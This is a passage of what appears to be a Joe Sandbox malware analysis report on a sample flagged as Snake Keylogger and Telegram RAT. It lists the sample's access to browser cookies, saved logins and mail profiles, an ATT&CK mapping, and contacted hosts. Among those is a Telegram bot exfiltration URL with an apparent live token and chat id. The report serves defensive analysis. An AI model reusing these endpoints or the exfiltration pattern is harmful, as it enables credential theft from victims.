          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040348F

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: 00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8180, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: 00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8180, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		1
          OS Credential Dumping          		3
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		1
          Software Packing          		LSASS Memory14
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		Logon Script (Windows)311
          Process Injection          		1
          DLL Side-Loading          		Security Account Manager111
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Masquerading          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		4
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
          Virtualization/Sandbox Evasion          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeylogging15
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1620273 Sample: rAntephialtic.exe Startdate: 20/02/2025 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 4 other IPs or domains 2->31 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Multi AV Scanner detection for dropped file 2->47 53 6 other signatures 2->53 8 rAntephialtic.exe 1 49 2->8         started        signatures3 49 Tries to detect the country of the analysis system (by using the IP) 27->49 51 Uses the Telegram API (likely for C&C communication) 29->51 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 11 powershell.exe 30 8->11         started        process6 file7 23 C:\Users\user\AppData\...\rAntephialtic.exe, PE32 11->23 dropped 25 C:\...\rAntephialtic.exe:Zone.Identifier, ASCII 11->25 dropped 55 Early bird code injection technique detected 11->55 57 Writes to foreign memory regions 11->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 11->59 61 3 other signatures 11->61 15 msiexec.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 33 checkip.dyndns.com 132.226.247.73, 49977, 49980, 49982 UTMEMUS United States 15->33 35 api.telegram.org 149.154.167.220, 443, 49994, 49995 TELEGRAMRU United Kingdom 15->35 37 3 other IPs or domains 15->37 39 Tries to steal Mail credentials (via file / registry access) 15->39 41 Tries to harvest and steal browser information (history, passwords, etc) 15->41 signatures11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          rAntephialtic.exe21%ReversingLabsWin32.Trojan.Garf
          rAntephialtic.exe26%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsd4D6C.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exe21%ReversingLabsWin32.Trojan.Garf

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://go.micr0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          		142.250.184.238
          		truefalse
            		high
            drive.usercontent.google.com
            		172.217.16.129
            		truefalse
              		high
              reallyfreegeoip.org
              		104.21.32.1
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		132.226.247.73
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        		high
                        https://api.telegram.org/bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2021/02/2025%20/%2004:32:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.usercontent.google.com/jmsiexec.exe, 00000006.00000003.1968586148.00000000099C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.microsoftpowershell.exe, 00000003.00000002.1828142930.0000000008382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Licensepowershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercontent.google.com/msiexec.exe, 00000006.00000003.1968586148.00000000099C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://chrome.google.com/webstore?hl=en4msiexec.exe, 00000006.00000002.2558138839.0000000025815000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://nsis.sf.net/NSIS_ErrorErrorrAntephialtic.exe, 00000001.00000000.1292918394.000000000040A000.00000008.00000001.01000000.00000003.sdmp, rAntephialtic.exe, 00000001.00000002.1362477384.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                    		high
                                                                    https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.2558138839.0000000025815000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://drive.google.com/Gmsiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.ecosia.org/newtab/msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.office.com/4msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1814890454.00000000049D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.google.com/msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://go.micrpowershell.exe, 00000003.00000002.1814545646.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000006.00000002.2558138839.0000000025810000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000006.00000002.2558138839.00000000256F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.000000002573E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2558138839.000000002573E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1814890454.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            149.154.167.220
                                                                                                            		api.telegram.orgUnited Kingdom
                                                                                                            		62041TELEGRAMRUfalse
                                                                                                            104.21.32.1
                                                                                                            		reallyfreegeoip.orgUnited States
                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                            172.217.16.129
                                                                                                            		drive.usercontent.google.comUnited States
                                                                                                            		15169GOOGLEUSfalse
                                                                                                            142.250.184.238
                                                                                                            		drive.google.comUnited States
                                                                                                            		15169GOOGLEUSfalse
                                                                                                            132.226.247.73
                                                                                                            		checkip.dyndns.comUnited States
                                                                                                            		16989UTMEMUSfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                            Analysis ID:1620273
                                                                                                            Start date and time:2025-02-20 20:00:18 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 7m 52s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:11
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:rAntephialtic.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/30@5/5
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 33.3%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 96%
                                                                                                            • Number of executed functions: 133
                                                                                                            • Number of non-executed functions: 28
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target msiexec.exe, PID 8180 because it is empty
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7700 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

